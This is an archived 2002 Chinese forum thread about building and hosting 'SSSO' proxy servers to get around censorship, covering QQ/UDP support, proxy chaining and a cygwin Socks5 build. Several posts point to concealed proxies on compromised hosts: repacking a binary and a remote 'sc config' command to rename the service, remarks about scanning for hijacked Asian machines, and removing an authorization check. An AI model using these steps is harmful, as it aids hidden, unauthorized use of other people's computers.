支持QQ的功能似不必要。如果只是这一点，那还是小巧点好。
2002-11-22 20:51:14
编辑这个贴子
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：66
积分：255
注册：2002-10-30
第3楼
发贴心情
软件提倡小巧实用.太大了当然不合适.但目前的SSSO服务器功能上是明显不够的,连国内应用最广泛的QQ都不支持,实在有点遗憾.我觉得新标准软件如果能在功能上有所突破的话,软件稍微大些也未尝不可.况且400K对于越来越多的宽带用户来说,只不过增加一、二秒的上传时间,而做好的SSSO服务器却可以为之效劳相当长的一段时间,这是值得的.况且软件用到一定的程度,趋势向大而全的方向发展,也是很自然的.
还请白云多作测试,看看新标准版本在速度和稳定性方面是否过关.如可,则采用新标准版本为好.
2002-11-22 21:01:09
编辑这个贴子
linux 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：200
注册：2002-10-28
第4楼
发贴心情
bouncer.exe可能不支持UDP包--猜，除QQ，没有做其他测试
2002-11-22 21:04:34
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第5楼
发贴心情
我看ccproxy似乎功能也很全面，不如用他，我在不去掉原有功能的前提下，可以把他压缩到220K，用他不错
2002-11-22 21:40:02
编辑这个贴子
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：140
积分：287
注册：2002-10-23
第6楼
发贴心情
我觉得ccproxy挺好，自己还可以打开他的其他代理功能并设置帐号，而且杀毒软件不会把一个正式软件作为病毒杀掉的

----------------------------------------------
最近比较忙，可能有留言的没时间回复了，请多多原谅！谢谢！
有事请留言，我不用其他方式联系，谢谢！

2002-11-22 21:49:28
编辑这个贴子
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：66
积分：255
注册：2002-10-30
第7楼

以下是引用乐助在2002-11-22 21:49:28的发言：
我觉得ccproxy挺好，自己还可以打开他的其他代理功能并设置帐号，而且杀毒软件不会把一个正式软件作为病毒杀掉的

如果那台服务器本身就做代理,会不会造成冲突?

2002-11-22 21:58:10
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第8楼
发贴心情
我是56k。。。。。。所以我是希望小一点好
2002-11-22 22:07:41
编辑这个贴子
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：66
积分：255
注册：2002-10-30
第9楼

以下是引用jzx在2002-11-22 22:07:41的发言：
我是56k。。。。。。所以我是希望小一点好

小,必须是要在保证功能上满足的前提下的小.
要SSSO的目的还是为了开拓网络突破,如果被"小"限死,那么它的应用也必然受到制约.

2002-11-22 22:37:27
编辑这个贴子
no.1 帅哥哟，离线，有人找我吗？

等级：管理员
文章：153
积分：577
注册：2002-10-26
第10楼
发贴心情
如果目前ssso服务器端的bouncer.exe支持SSL加密的话，功能又稳定，用它最好了。但4.0版本制作的代理我没有用过，以前的版本我觉得还行啊，都能冲破网络封锁啊。

至于ccproxy，我也觉得不错，因为也有许多人用它来做局域网代理的，据说很好用。但我不知道它与SocksCap稳定兼容否？？对这个我不太懂，如果也很稳定的话，再搞一个ccproxy版本也很好啊。

至于支持QQ与否，我认为完全没有必要，我们用的是突破网络封锁就ｏｋ了，至于其它花乔的功能，还是不要的好，还需要花费太多的时间，开发一个软件，需要大量的精力和时间，这点是局外人难于想像的，更何况是免费的酷东东，另外，对我们来说，时间宝贵，能保持完全安全地突破网络封锁就行了。还有QQ的一切活动已经被它们完全控制，你要想耍什么花样，也逃不出魔爪的控制，除非你在外国，但如果在外国的话，也没有必要用代理了。

----------------------------------------------
有事请留言，我不用其他方式联系，谢谢！

2002-11-23 0:14:01
编辑这个贴子
flyma 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：30
注册：2002-10-24
第11楼
发贴心情
其实你不还是不大理解的，对某些人来说，能上QQ比能突破网络更重要的，并不是每个人都想突破网络封锁的。如果不支持QQ的话，我敢打包票，SSSO绝对不可能取代跳板的。
2002-11-23 0:48:40
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第12楼
发贴心情
其实你不还是不大理解的，对某些人来说，能上QQ比能突破网络更重要的，并不是每个人都想突破网络封锁的。如果不支持QQ的话，我敢打包票，SSSO绝对不可能取代跳板的。

我觉得不是谁代替谁的问题，不同的工具有不同的用处。
2002-11-23 1:21:38
编辑这个贴子
no.1 帅哥哟，离线，有人找我吗？

等级：管理员
文章：153
积分：577
注册：2002-10-26
第13楼
发贴心情
对，SSSO无须取代跳板，但他比跳板功能更为强大，安全，至于QQ，我认为没有必要在上面花费开发者的心思了，除非ccproxy本身就支持QQ，那就是另外一回事情了。

只要ｓｓｓｏ是最安全、最稳定的破网工具就ｏｋ了，其它功能不要也罢。

----------------------------------------------
有事请留言，我不用其他方式联系，谢谢！

2002-11-23 1:34:48
编辑这个贴子
admin 帅哥哟，离线，有人找我吗？

等级：管理员
文章：251
积分：743
注册：2002-5-19
第14楼

以下是引用flyma在2002-11-23 0:48:40的发言：
其实你不还是不大理解的，对某些人来说，能上QQ比能突破网络更重要的，并不是每个人都想突破网络封锁的。如果不支持QQ的话，我敢打包票，SSSO绝对不可能取代跳板的。

我同意尽量支持qq, 让更多的人来用，这也是价值，对大家的安全只有更好。 不过一个软件从出来，到推广，是需要很长的时间的。

----------------------------------------------
但聚有缘走四海
不落纤尘出凡间

2002-11-23 2:05:40
编辑这个贴子
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：130
积分：296
注册：2002-10-23
第15楼
发贴心情
不知关于对QQ的支持是怎么支持的，ccproxy做的socks5支持QQ，但用在ssso中不行，如果新的socks5支持QQ上ssso，那应该做一个，因为据我所知很多网友都用QQ，他们不会很复杂的技术，对安全问题也不怎么在意，提供支持QQ的ssso对他们来说比较有意义。不过通过ssso使用QQ是否就安全了还需要进一步探讨。

用ccproxy作ssso有一段时间了，它的稳定性和速度都可以，不知新版socks5在这方面怎么样，还是先测试一下吧。

2002-11-23 2:15:07
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第16楼
发贴心情
我得说明，现在无论你用了多少层socks5代理或者ssso代理，恐怕也无法避开QQ的邪恶监控，因为你的聊天记录都会保存到它们那里去，加密不加密都一样。那些用跳板上QQ的请千万注意！你用了255个跳板上效果和直接上是一样的！可能会隐藏ip（如果QQ里面没有木马的话），但聊天记录你无法避免被监控，一个不留神在聊天中暴露了说明信息，email啊、其他msn啊、电话啊……你就全暴露了，不是我吓唬你，你到深圳找它们公司一个员工做朋友，打听一下，比我说的还吓人呢！那么多的记录，一个按钮下去，一切敏感字眼都出来了，然后分析一下，重点监控有嫌疑的人，你的任何一个举动都实时被它们记录了。
2002-11-23 8:44:26
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第17楼
发贴心情
就这样了，不变了。为了一个会给大家虚幻安全的功能增加400K的体积不好，目前的ssso完全支持网页浏览和下载以及MSN、FTP，已经够用了。
2002-11-23 8:52:15
编辑这个贴子
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
第18楼
发贴心情
如果方便的话，SSSO最好能级联。
2002-11-23 11:00:24
编辑这个贴子
sunday 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：5
积分：64
注册：2002-10-28
第19楼
发贴心情
软件还是小而精好，关键是安全、稳定、能有效突破疯锁。当然也可以考虑同时提供两个版本，一个是带QQ版的，另一个是不带QQ版的，供网友自由选择。另外，不知新版本是否能增加批量测试ssso代理功能，一是测代理是否有效，二是测代理的速度，我认为这才是当务之急。
2002-11-23 11:09:19
编辑这个贴子
linux 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：200
注册：2002-10-28
第20楼
发贴心情
》新编译了
有源代码的。
》标准的socks5代理服务器
现在就是“标准的”。不用再开发了。--答“开发一个软件，需要大量的精力和时间”。
2002-11-23 11:28:25
编辑这个贴子
flyma 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：30
注册：2002-10-24
第21楼
发贴心情
不明白，QQ会被监控跟你ssso支持qq有什么关系呢，其实更准备一点的说法应该是支持udp而不是说支持QQ，如果QQ不是一定要用udp的话，用现在的ssso代理也能上QQ的，难道会因为你用tcp不用udp，QQ就不被监控，不可能!并且能做成完成的socks5是很好的，很多工具要用udp的，而且如果可能的话，程序也不会很大，跳板就是一个很好的例子。
想再强调一点的就是，支持不支持UDP跟你QQ会监控完全是两码事.
2002-11-23 13:30:25
编辑这个贴子
linux 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：200
注册：2002-10-28
第22楼
发贴心情
没有关系。
但Stunnel好象不支持UDP。这样SOCKS5服务器支持UDP，到最后Stunnel不支持也不行。
单独使用SOCKS5服务器的话，就没有问题。
2002-11-23 21:43:02
编辑这个贴子
东周列国 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：51
积分：91
注册：2002-10-24
第23楼
发贴心情
我想到一点, 提出来给大家做 参考.

QQ软件 是可以查 到 对方 I P 得, 那就算是 查到我们 SS0 代理 得 IP, 那如果这个 SSO代理 IP 也被 跟踪了监控了,或者破解该SSO代理, 装了个什么~~软件, 那所有用 这个SSO 代理得朋友们 是不是很被动呢?

本来 ss 0 资源就很有限, 如果支持QQ得话... 是不是会更快地消耗SSO资源?

我意见不一定对, 提出来 大家商量一下

----------------------------------------------
遥望家乡盼春来...

2002-11-23 21:53:10
编辑这个贴子
小开 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：55
积分：134
注册：2002-10-30
第24楼
发贴心情
用ssso上qq聊天，qq被监控，ssso的ip就暴露了。
qq是被国内严密监控的聊天工具，喜欢qq聊天的网友,我们从来也没有反对，那又何必用ssso上qq聊天？普通方式就可以了呀。和ssso的意义完全是两码事呀。
ssso是突破封锁不被监控自由浏览敏感网页的好工具，为什么一定要和被严密监控的qq软件搞在一起呢？
楼上这位混淆的概念搞来搞去，实在不知要如何回答你，但我想我们已经把问题表达的很清楚了。
2002-11-23 21:55:50
编辑这个贴子
flyma 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：30
注册：2002-10-24
第25楼
发贴心情
笑话，你登录QQ的服务器，QQ的服务器当然知道你的IP咯，就算你是登录普通的论坛，论坛也是可以知道你的SSSO的代理的IP的，加密只是加密传输的内容而已。
至于要支持UDP当然在服务器端不可能是简单的映射了，要再加一个tcp->udp的转转化，而客户端当然还要加udp->tcp的转化啦，类似于跳板。
想不想支持随便你们咯!
2002-11-24 3:16:37
编辑这个贴子

本主题贴数38，分页： [1] [2]


清心论坛--精华专题浏览：征求意见－关于ssso服务器端的修改

→ 浏览：征求意见－关于ssso服务器端的修改

您是本帖的第 599 个阅读者
* 贴子主题： 征求意见－关于ssso服务器端的修改
沧海一粟 帅哥哟，离线，有人找我吗？

等级：论坛游民
文章：101
积分：288
注册：2002-10-23
第26楼
发贴心情
建议还是出一个ccproxy的ssso，bounce版本的无法登陆加密邮箱，多几个版本没什么不好，各人根据自己的需要选择，毕竟现在两个版本都有缺陷。
2002-11-24 7:46:40
编辑这个贴子
linux 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：200
注册：2002-10-28
第27楼
发贴心情
我想见到新代理程序（包括源程序）的独立发行版本。
2002-11-24 11:36:48
编辑这个贴子
linux 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：200
注册：2002-10-28
第28楼
发贴心情
哪里有得下载
2002-11-24 11:37:50
编辑这个贴子
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：66
积分：255
注册：2002-10-30
第29楼
发贴心情
看了很多朋友的发言，给我印象很深的是大部分朋友都对电脑比较擅长精通，而象我这样虽然喜欢在网络上游荡，但却对电脑网络技术知之甚少，真的感到惭愧。
关于以上话题的讨论，外行人也只好说些外行话，我觉得不管怎么说，技术的不断进步是必然趋势，任何自我满足、甚至固步自封都是不可取的。从现实情况看，目前SSSO的缺陷也是非常明显的，由于受到兼容性的限制，只能达到网络需求最基本的目标。尽管有些朋友说“够了”，我觉得这不是他们的真心话，因为没有人不想好上加好的。当然，所有的朋友都应该感谢象白云这样的热心人，真是他们无私的奉献，才让我们看到外面的精彩世界。但个人的时间和精力毕竟比较有限，在开发过程中遇到一下子难以攻克的困难是可想而知的。不过我相信，追求完美是任何正常的人们的自然行为，让我们大家给白云这样的朋友多些支持和鼓励，再多给他们一些时间，SSSO必然走向成熟，速度更快、性能更稳定、应用更广泛，要不了多久，所有的朋友都会发现，现在觉得不必要和不可能的事情，到时已经大部分实现了。
2002-11-24 16:15:45
编辑这个贴子
东周列国 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：51
积分：91
注册：2002-10-24
第30楼
发贴心情
如果这样的话, 我不理解你为什么非要把 SSO 支持QQ呢? 既然 QQ能暴露 SSO代理的 I P,..

那这么好的 突破疯网的 SSSO 软件...用来支持 暴露I P 的QQ... 做什么那?

让 QQ 把难得的 SSO 代理都暴露...? 呵呵, 逻辑上好像是这样, 看来QQ 这东西真危险

----------------------------------------------
遥望家乡盼春来...

2002-11-27 1:07:06
编辑这个贴子
particle 帅哥哟，离线，有人找我吗？

等级：管理员
文章：67
积分：225
注册：2002-10-30
第31楼
发贴心情
ssso的服务端还是小巧一点的好.支持QQ没这个必要.因为你就是用ssso上QQ也不能保证安全,所以就不用QQ了.这是最好的办法.如果真的有必要用QQ的话,就不要在QQ里面谈敏感的内容.可以用一些个其它词来代替.
2002-11-27 9:41:06
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第32楼
发贴心情
好，不会让ssso支持QQ的了。
2002-11-27 10:00:43
编辑这个贴子
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：66
积分：255
注册：2002-10-30
第33楼
发贴心情

关于在SSSO中支持QQ的问题，我认为应该从几个方面来理解。
1.本讨论和其他一些话题中的重要提示，QQ肯定是不安全的，如果CHAT涉及到安全问题，建议不要用QQ。
2.QQ的安全问题和SSSO无关，这一点在flyma的观点中表述得比较清楚，并不是用了SSSO才使QQ更加不安全的。而把SSSO的安全问题直指支持QQ所引起的说法，显然是牵强附会，更是因噎废食。
3.SSSO并非必须支持QQ，但不支持QQ似乎有点遗憾，毕竟QQ在国内有广泛的网络爱好者基础。
4.目前的SSSO不支持QQ只是个表象，不支持UDP才是实质。这是一个明显缺陷。如果只是以保守的态度来满足现状，肯定有违于技术不断进步的必然趋势。
5.使用QQ者绝大部分并不是特别在意安全问题，但也并非任人宰割，他们在不会复杂技术的情况下，想尽办法隐藏IP地址，这也是为什么国内特别流行普通代理和跳板的原因。关于这一点，asd也作了阐述。
6.我本人也用QQ，一般通过跳板登陆。虽然知道根本不可能完全解决安全问题，但相信至少可以不让其他人轻易窥视。网络浏览则通过SSSO。使用时需要切换，显得比较麻烦。

这里仅仅是个讨论，通过讨论，可以让大家知道存在的问题，以及寻求解决问题的方法。至于SSSO，到底如何做的决定权在白云，相信他会听取各方意见，权衡利弊后，在安全的前提下把它做得更实用。

2002-11-27 10:58:48
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第34楼
发贴心情
ssso的服务端小和大都无所谓了。我们可采用asd的方法，快速安装ssso的服务端
2002-11-27 15:18:59
编辑这个贴子
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：66
积分：255
注册：2002-10-30
第35楼
发贴心情
asd的快速安装ssso的方法确实是快,但也麻烦,还需要事先另外找个服务器放置文件.这对于大部分人来说并不合适.
2002-11-28 11:41:11
编辑这个贴子
兰天 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：25
积分：156
注册：2002-10-28
第36楼
发贴心情
能不能实现这样的目的。当然我完全不懂计算机，大家不要笑话。
ssso在被监控的情况下ip会暴露，这点是不可质疑的 ，那么，他们试图查看你的真实ip的时候，能不能在这中间环节增加一个数据包，使他们看到的是一个虚假的地址，也就是增加一个国外的或者根本不存在的数据库，他们看到的是一个假的地址，而凡是有ip进入这个数据库，就被禁止， 从而也就没有办法再继续进一步追查。

----------------------------------------------
一切为他人

2002-11-30 8:41:56
编辑这个贴子
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
第37楼

以下引自兰天在2002-11-30 8:41:56的建议
...中间环节增加一个数据包，使他们看到的是一个虚假的地址，也就是增加一个国外的或者根本不存在的数据库，...

兰天提出的问题，应该可以通过 SSSO 服务器支持级联的方式解决。只是不知道实现起来是否有难度，以及白云是否感觉有必要啦！ ^_^

[此贴子已经被作者于2002-11-30 15:10:44编辑过]
2002-11-30 15:08:37
编辑这个贴子
刘文正 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：35
积分：89
注册：2002-11-29
第38楼
发贴心情
跳板支持qq!
ssso是用来做更有意义的事情的工具！！！！！！！！！！！！！！！！
2002-11-30 22:19:33

本主题贴数38，分页： [1] [2]


[原创]手动修改FREESURF的显示名称。

→ 浏览：[原创]手动修改FREESURF的显示名称。

* 贴子主题： [原创]手动修改FREESURF的显示名称。

daemon

等级：新手上路
文章：5
积分：83
注册：2002-10-30
发贴心情 [原创]手动修改FREESURF的显示名称。
需要软件：1、ASPDIE；2、ULTRA EDIT；3、ASP
思路：脱壳------更改显示名称------加壳
具体步骤：
1、经过分析，原来flatserver是用ASP加的壳，好办了，运行ASPDIE，选择目标软件flatserver.EXE。运行，OK，成功去壳，去壳后的软件就在那个目录下面，名为：Unpacked.ExE。

2、既然脱了壳，各位就可以象修改跳板一样，使用ULTRA EDIT查找字符串flatsurfer 0.1，将前面的这些字母替换成为不很明显的其他字母。替换完成后，存盘退出。

3、用ASP继续将Unpacked.ExE加壳，改名为flatserver.exe就可以象以前一样用了，只不过显示的服务名就换成自己更改的了。

上面只不过提供思路，简单讲解了更改显示名称的办法，其实服务名称也一样可以改，就看你自己的了。改了服务名称后，一定记住，启动服务的时候也一定要用新的名称，否则是无法启动的。
在下抛砖引玉，献丑了。

chinachina 其实sc.exe这个软件也可以修改服务名称（支持远程修改）
sc config flatservice Displayname= BOOTAPI


flat通过http代理连接上网

* 贴子主题： flat通过http代理连接上网
古风

等级：新手上路
文章：56
积分：180
注册：2002-11-6
发贴心情 flat通过http代理连接上网
以下是引用善缘在2002-12-6 8:51:17的发言：
myie通过flat直接连接可以上网，但flat通过http代理连接则无法上网，http代理测试过可用。你们试过可以吗？如果可以的话就相当于级联功能了。

可以的，我试过了。本帖子就是这样发的。
asd | 也许选用的http代理不支持穿越吧。
古风 以你的flatsurfer为目标，用cjproxychain建立http代理链，从中提出的http代理就可以用。
见《jproxychain+flatsurfer＋myie用法》。
善缘 | 确实是HTTP代理穿越的问题，可以用古风的方法，也可以去新人类下载PROXYCHECK，检验后表明有ELITE的就可以穿越。


[原创]jproxychain+flatsurfer＋myie用法
所需工具：java、jproxychain、chatsurfer、myie
下载地址：
java： http://java.sun.com/（注意：要根据你的操作系统下载相应的Java）
jproxychain、chatsurfer： http://jproxychain.no-ip.com/
myie： http://qingxin.mine.nu
使用前提：当你使用的chatsurfer因被封连接不上时，或你想牺牲速度换取更加安全时。
使用方法：
1、安装Java运行环境
2、生成最佳代理链
将新版的cjproxychain.zip解压到一文件夹A，然后上网，双击并运行A中的jproxytool.bat，出现提示符：
#
（以全过程为例：下载->验证->建链->存盘->退出）
# download
# verify [image] www.microsoft.com
# make 24.28.199.157:443
# save
# quit
注意：在建链时，24.28.199.157:443可要换成你的chatsurfer服务器地址和端口。
3、运行代理调度服务程序
双击并运行jproxychain.bat
4、启动chatsurfer客户端程序
先运行flatcert.exe生成客户端证书，然后启动chatsurfer客户端程序flatclient.exe，将你的chatsurfer服务器地址、端口和公钥填好,http代理选择“通过代理连接主机和端口：”填入代理和端口：
127.0.0.1:9999
运行。
5、启动myie浏览器
在选项－－快速代理设置中新增一代理
127.0.0.1:6700
并在”使用代理“前打勾。（注意以后再用时还需要在选项－－使用代理服务器项目上打勾）
好了，填入你想去的网址，冲浪吧。
其它软件使用代理时地址填“127.0.0.1:6700”，以下是几种常用软件的设置情况：
1、在CUTEFTP中使用FLATSURFER时，要将其设置成SOCKS5，设置成HTTP代理不能连通，（另外，该软件不能作为FTP代理使用）。
2、在FOXMAIL中使用时要设置在短信代理服务器HTTP　PROXY一项上，设置成SOCKS5不能连通。
3、在flashget中设置成http或socks代理均可。


清心论坛--精华专题浏览：NT下可以作ssso

→ 浏览：NT下可以作ssso

您是本帖的第 100 个阅读者
* 贴子主题： NT下可以作ssso
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：126
积分：281
注册：2002-10-23
发贴心情 NT下可以作ssso
昨天听“阳光”说他做了两个NT的ssso，今天找了个NT试了一下，果然可以，不过是用ccproxy5.2做的，也许原来不能成功是snake跳板的问题，有条件的朋友可以试一试，如果没问题的话，那可方便多了。另外，ccproxy5.3做的ssso不稳定，很容易失效，也许是破解不完全的原因。
2002-12-2 14:35:15
鲜花(0) 鸡蛋(0)
善缘 美女呀，离线，快来找我吧！

等级：新手上路
文章：36
积分：114
注册：2002-11-10
第2楼
发贴心情
NT下可以做SSSO吗？用的是哪个版本？我怎么都不行。不会是跳板问题，我在NT下做跳板都行的。
2002-12-2 20:07:51
编辑这个贴子
summer 美女呀，离线，快来找我吧！

等级：版主
文章：20
积分：50
注册：2002-11-15
第3楼
发贴心情
ccproxy5.3在2000下到没发现不太稳定。但ＮＴ下做成后，不是哪里都能去，去国内还行，比如google去不了，但yahoo却能去，人民报去不了，但打大纪元却能去。怪！
2002-12-2 20:22:09
编辑这个贴子
善缘 美女呀，离线，快来找我吧！

等级：新手上路
文章：36
积分：114
注册：2002-11-10
第4楼
发贴心情
你们都是用哪个版本做的？
2002-12-2 23:23:03
编辑这个贴子
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：126
积分：281
注册：2002-10-23
第5楼
发贴心情
自己改装的。
2002-12-2 23:52:59
编辑这个贴子
summer 美女呀，离线，快来找我吧！

等级：版主
文章：20
积分：50
注册：2002-11-15
第6楼
发贴心情
自己动手，丰衣足食。
2002-12-3 3:02:27
编辑这个贴子
善缘 美女呀，离线，快来找我吧！

等级：新手上路
文章：36
积分：114
注册：2002-11-10
第7楼
发贴心情
怎么改，主要是以哪种方式启动？
2002-12-3 8:18:37
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：56
积分：180
注册：2002-11-6
第8楼
发贴心情
可以把自己改装的放到认证论坛里让大家试一试嘛，也算帮助白云作测试。
2002-12-3 13:03:48
编辑这个贴子
水滴 帅哥哟，离线，有人找我吗？ 魔羯座1955-1-16

等级：版主
文章：25
积分：78
注册：2002-10-30
第9楼
发贴心情
做了几个全是NT的，工具4.0版，助手1.63。我可不知道NT不能做啊。
2002-12-3 18:11:23
编辑这个贴子


清心论坛--精华专题浏览：socks5代理服务器－视窗版的！

>> 关于跳板和SSSO的内容，以后请在这里讨论。。。
清心论坛 → 精华专题 → 浏览：socks5代理服务器－视窗版的！

您是本帖的第 205 个阅读者 浏览上一篇主题 刷新本主题 树形显示贴子 　 浏览下一篇主题
* 贴子主题： socks5代理服务器－视窗版的！
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：98
积分：479
注册：2002-10-24
楼顶
发贴心情 socks5代理服务器－视窗版的！
下载地址： http://fztd.tripod.com/socks5.zip 1.39M

由不死鸟编译的视窗版的socks5服务器及源代码。NEC Socks5 代理服务器Win32版本
--完善强大的Socks5代理服务器软件

大名鼎鼎的SocksCap是NEC的产品，而NEC的Socks5服务器大家可能用的不多，其实在Linux/Unix中名气是很大的，并且是有源代码的软件。
如今通过cygwin( [image] http://www.cygwin.com)生成NEC Socks5服务器的Win32版本，使得Win32平台上，Socks5代理服务器软件又增加了一个强劲成员。经过测试发现他支持QQ（Bouncer不支持QQ）。这样看来，可能NEC的Socks5服务器实现Socks5协议比较完整。

下载编译好的程序（包括：修改过的源程序及可执行程序）

NEC SOCKS5 WIN32版本主要的3个文件
Socks5.exe 主程序 （158K）
Socks5.conf Socks5配置文件（默认配置只容许本机使用）
cygwin1.dll cygwin的支持文件 （906K）
（注：Socks5.passwd、Socks5.conf在Linux的目录是/etc，Win32版版改成当前目录）

运行方式：
Socks5 -t -f -s
-t 线程方式运行，对WIN32平台必须。
-f 前台运行
-s 显示错误信息
运行后不要关闭窗口。
Socks5.exe的使用请参考：“在Unix中配置Socks 5”、“将Linux配置为代理防火墙”。

你也可以自己编译。

编译的步骤/要点：

1、下载SOCKS5软件包。socks5-v1.0r11.tar.gz （395K）

2、下载/安装cygwin软件，全部下载的大小220MB，建议全部安装大小600-700M。

3、修改cygwin\usr\include\cygwin\if.h文件。
在
#define IFF_LOOPBACK 0x8 /* is a loopback net */
后添加：
#define IFF_POINTOPOINT 0x10 /* */

4、
修改server\daemon.c，屏蔽//的部分。
//chdir("/");（必须）
修改server\udp.c，屏蔽/**/的部分。（这个步骤不是必须的，如果不屏蔽，运行代理的机器不可以使用UDP代理）
lsAddrCopy(&pri->dstAddr, &pri->srcAddr, lsAddrSize(&pri->srcAddr));
/* no Authorize
if (Authorize(pri, 0) != AUTH_OK) {
S5LogUpdate(S5LogDefaultHandle, S5_LOG_ERROR, 0, "UDP Setup: Setup failed: permission denied");
s5err = SOCKS5_AUTHORIZE;
rval = EXIT_AUTH;
goto cleanup;
}
*/

5、运行cygwin，在cygwin中，切换到Socks5软件包目录--请先解压。

6、运行
./configure --with-threads --with-libconffile=libsocks5.conf --with-srvconffile=socks5.conf --with-srvpidfile=socks5.pid --with-srvpwdfile=socks5.passwd --with-srvidtfile=socks5.ident

7、运行./make

这样server\Socks5.exe编译出来了，结合cygwin\bin\cygwin1.dll，以及手工编辑的Socks5.passwd、Socks5.conf，就是可以运行的SOCKS5代理服务器软件。

[此贴子已经被作者于2002-11-24 17:52:10编辑过]
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-24 17:46:44
鲜花(0) 鸡蛋(0)
linux 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：68
积分：197
注册：2002-10-28
第2楼
发贴心情
谢谢
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-24 18:11:07
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：125
积分：276
注册：2002-10-23
第3楼
发贴心情
好像不能改端口，固定是1080。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-24 21:15:00
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：98
积分：479
注册：2002-10-24
第4楼
发贴心情
可以的。参数：-b 1234
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-25 8:15:08
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：125
积分：276
注册：2002-10-23
第5楼
发贴心情
能不能把其它几个参数解释一下，自带的说明看不懂。
点击查看用户来源及管理<br>发贴IP：*.*.*.* 2002-11-25 13:55:57

本主题贴数5，分页： [1]

Powered by：DVBBS Ver5.0 Final
Copyright ?2000 - 2002 AspSky.Net , 页面执行时间：209.961毫秒


清心论坛--精华专题浏览：请注意,不要好心做坏事

清心论坛 → 精华专题 → 浏览：请注意,不要好心做坏事

您是本帖的第 381 个阅读者
* 贴子主题： 请注意,不要好心做坏事
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：225
注册：2002-10-30
楼顶
发贴心情 请注意,不要好心做坏事
SSSO尽管是比较安全的,但某个服务器一当公布出来变成大家都知道的东西,那么它就非常不安全了,极有可能被监视,从而变成了一个陷阱.........所有使用这些SSSO的人,一举一动都在别人的眼皮底下,这是非常危险的.
所以,最好不要去使用这些公开的SSSO,除非你想尝试一下被人跟踪的滋味........
要想使用SSSO,可以悄悄地向斑竹和其他熟悉的人要IP,最理想的当然是自己学着做了.
也希望斑竹和所有热心人不要好心做坏事,到时候害了别人你会好受吗?
千万警惕,我认为应该删掉所有在这里公开的SSSO,以避免大家都不希望看到的事情发生.
白云 | 同意，已经删除。大家要学习自己做ssso，不会就问。
admin 事情就是那么复杂。。。
当清心把代理从主页上拿下去的时候，已经有无数的人抱怨了。
现在要是把公布的都拿掉， 那是什么结果呢？ 现在有能力做ssso的才有几个？
ipc | 自己做吧！其实挺简单的，失败几次就能做好， 不论你有多菜！！别忘了还有这么多热心的高手指点。
sync 不会可以学啊,这个论坛开着就是让大家学点东西的.
SSSO是需要一个一个做出来的,不象HTTP和SOCKS代理那样可以满世界搜索得到,公布出来后一是容易失效,二是容易被监控,所以应该更为谨慎为好.如果有急用,你可以向斑竹要,也是很方便的事情,你发个短信就可以了.相信这里的斑竹会很乐意帮忙的.
拂尘子 自己做ssso代理并不难
我觉得做任何事情关键还在于自己的决心。刚开始时我对自己下决心说，我要在一个星期之内一定要学会做SSSO代理。这样，我看一些帮助文章就变得很认真了，很快，也就过了几个小时时间吧， 我也做成功了。其实乐助同学编的软件很好用，挺傻瓜的，不信你也试试。我想只要大家都有这样的心态，谁能封住我们呢？
summer | 万事开头难，多扫点一定会扫到的。亚洲这一类的肉鸡应该是很多的。
古风 | 几天都搜索不到有可能是有za防火墙，把internet zone security设到med.
水滴 | 它们正愿意你们“完全”从“技术”角度考滤问题呢！！技术的因素有，但有些事儿，主要的还在“心”上，不要被戏迷了。不是“所有的人都象你们一样愿意花很多力气去深入的了解某种东西”，为了他们考虑，SSSO必须要公布，少一些不怕，但必须要有公布的，再从另一个角度想一下：留着吧，时间一过，一切都迟了，他们的“人”身安全虽然保证了，但未来.................
HighWind | 还是自己做有意思，速度也有保证，还可以学到很多东西，流光，dos编程什么的，还可以自己改进SSSO~


清心论坛--精华专题浏览：终于做出了一个ssso!

→ 浏览：终于做出了一个ssso!

